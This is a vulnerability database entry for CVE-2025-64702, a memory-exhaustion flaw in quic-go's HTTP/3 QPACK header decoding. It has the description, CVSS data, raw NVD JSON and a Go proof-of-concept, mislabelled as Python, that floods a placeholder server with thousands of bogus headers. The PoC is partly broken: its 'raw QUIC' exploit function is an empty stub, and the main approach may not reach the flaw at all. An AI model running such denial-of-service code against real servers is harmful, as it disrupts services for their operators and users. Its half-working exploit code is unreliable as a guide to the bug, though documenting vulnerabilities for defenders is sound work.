Security Vulnerability Report
中文
CVE-2025-64702 CVSS 5.3 MEDIUM

CVE-2025-64702

Published: 2025-12-11 21:15:55
Last Modified: 2026-02-17 15:58:28
Source: [email protected]

Description

quic-go is an implementation of the QUIC protocol in Go. Versions 0.56.0 and below are vulnerable to excessive memory allocation through quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion. This issue is fixed in version 0.57.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:quic-go_project:quic-go:*:*:*:*:*:*:*:* - VULNERABLE
quic-go < 0.57.0
quic-go = 0.56.0
quic-go < 0.56.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64702 PoC - QPACK Header Exhaustion Attack // This PoC demonstrates sending a malicious QPACK-encoded HEADERS frame // that decodes to a very large header section package main import ( "context" "crypto/tls" "fmt" "net" "net/http" "time" "github.com/quic-go/quic-go/http3" ) func generateMaliciousHeaders() []string { // Generate thousands of unique header names // This will cause memory exhaustion when decoded headers := []string{} for i := 0; i < 10000; i++ { headers = append(headers, fmt.Sprintf("X-Malicious-Header-%d", i)) headers = append(headers, fmt.Sprintf("Value with padding data to increase memory usage %d", i)) } return headers } func exploitCVE202564702(targetURL string) error { // Create HTTP/3 client with custom settings client := &http.Client{ Transport: &http3.RoundTripper{ TLSClientConfig: &tls.Config{ InsecureSkipVerify: true, }, }, } // Create request with malicious headers req, err := http.NewRequest("GET", targetURL, nil) if err != nil { return err } // Add malicious headers that will cause memory exhaustion maliciousHeaders := generateMaliciousHeaders() for i := 0; i < len(maliciousHeaders); i += 2 { req.Header.Set(maliciousHeaders[i], maliciousHeaders[i+1]) } // Send the request ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) defer cancel() resp, err := client.Do(req.WithContext(ctx)) if err != nil { return fmt.Errorf("request failed: %w", err) } defer resp.Body.Close() fmt.Printf("Response Status: %s\n", resp.Status) return nil } func main() { target := "https://target-server:443/" fmt.Println("CVE-2025-64702 PoC - QPACK Header Exhaustion") for i := 0; i < 10; i++ { fmt.Printf("Sending request %d...\n", i+1) if err := exploitCVE202564702(target); err != nil { fmt.Printf("Error: %v\n", err) } time.Sleep(100 * time.Millisecond) } fmt.Println("Attack completed") } // Alternative raw QUIC implementation for more direct exploitation type MaliciousQUICClient struct { conn net.PacketConn } func (m *MaliciousQUICClient) craftMaliciousHeadersFrame() []byte { // Craft QPACK-encoded HEADERS frame with: // 1. Small compressed size (passes size checks) // 2. Large decoded size (causes memory exhaustion) // This requires careful QPACK encoder manipulation frame := make([]byte, 0) // QPACK instruction to create many dynamic entries // with duplicate references to maximize decoded size return frame }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64702", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:54.707", "lastModified": "2026-02-17T15:58:28.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "quic-go is an implementation of the QUIC protocol in Go. Versions 0.56.0 and below are vulnerable to excessive memory allocation through quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion. This issue is fixed in version 0.57.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quic-go_project:quic-go:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.57.0", "matchCriteriaId": "95E31549-EBE1-4F00-91C4-148BE3980FD0"}]}]}], "references": [{"url": "https://github.com/quic-go/quic-go/commit/5b2d2129f8315da41e01eff0a847ab38a34e83a8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-g754-hx8w-x2g6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.